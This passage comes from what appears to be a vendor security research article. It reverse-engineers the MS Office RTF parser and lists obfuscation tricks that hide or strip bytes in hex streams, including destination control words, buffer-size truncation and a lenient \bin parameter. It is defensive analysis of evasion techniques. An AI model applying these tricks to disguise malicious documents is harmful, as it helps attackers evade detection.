However, by using {\aftnnalc FF}, FF will get into the decoded data because the destination is still equal to objdata.

It is also worth noting that {\objdata FF} still can’t be used because the buffer will not be restored.

An accurate list of all destination control words was created with a simple fuzzer.

Fixed-size buffer
Another obfuscation technique that comes to mind while looking at the code of an RTF parser is not related to this ‘MSB’ bug, but can also be used to remove bytes from a hex-stream. The technique’s related to the temporary buffer size and how a control word and numeric parameter are parsed in the states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER. You can see an example of its use in the following screenshot.

In this example the size of the data that will be removed as part of the numeric parameter is calculated using the formula: 0xFF (size of temporary buffer) – 0xB (size of ‘oldlinewrap’) – 2 (null-terminator characters) = 0xF2.

Unnecessary data
While the techniques described above are related to general RTF parsing, the processing of some specific keywords conceals some further confusion.

According to the specification states, if \* was encountered right before a control word or control symbol that was not found in the lookup table, its considered an unknown destination group and all the data up to the closing brace } that closes this group should be discarded. The lookup table in MS Office contains control words that are not present in the specification and it raises concerns that it will be changed in future, affecting parsing of the same document on different versions of MS Office. When the function responsible for processing keywords encounters such cases or one of the specific control words (such as \comment, \generator, \nonshppict and so on), it will set the state PARSER_SKIP_DATA and the number for encountered opening braces { to 1.

enum

{

// …

PARSER_SKIP_DATA = 0xF,

// …

PARSER_SKIP_DATA_CHECK_B = 0x13,

PARSER_SKIP_DATA_CHECK_I = 0x14,

PARSER_SKIP_DATA_CHECK_N = 0x15,

PARSER_SKIP_DATA_GET_BIN_VAL = 0x16,

PARSER_SKIP_DATA_INNER_DATA = 0x17,

// …

};

Kind of magic
During analysis of the PARSER_SKIP_DATA* states I found things that are the opposite not only to the specification but also to the rest of the parser code.

While looking for the \bin control word, this states will skip data, changing the number of encountered opening and closing braces until that number equals zero. The hidden catch lies in the way the numeric parameter is processed.

First of all, the maximum allowed length of the numeric parameter is increased up to 0xFF – it’s calculated without considering the length of the control word.

The second catch is that the numeric parameter is not numeric anymore! The parser allows not only decimal characters but also Latin characters to pass. Then this parameter is passed to custom strtol, making it possible to specify the length of data that should be skipped without considering opening and closing braces as a hexadecimal number.

Obfuscations with the use of these two primitives have not yet been encountered in the wild.

Conclusion
Reverse engineering has proved to be the most effective way to build a parser, and in the case of RTF it would most likely be impossible to achieve the desired behavior otherwise.

Exact parsing depends on small implementation details and algorithmic bugs rather than on a specification that could be confusing or state things that are not true.

Kaspersky Lab products detect all kinds of RTF obfuscation and perform the most correct processing of RTF files, providing the best protection to our end users.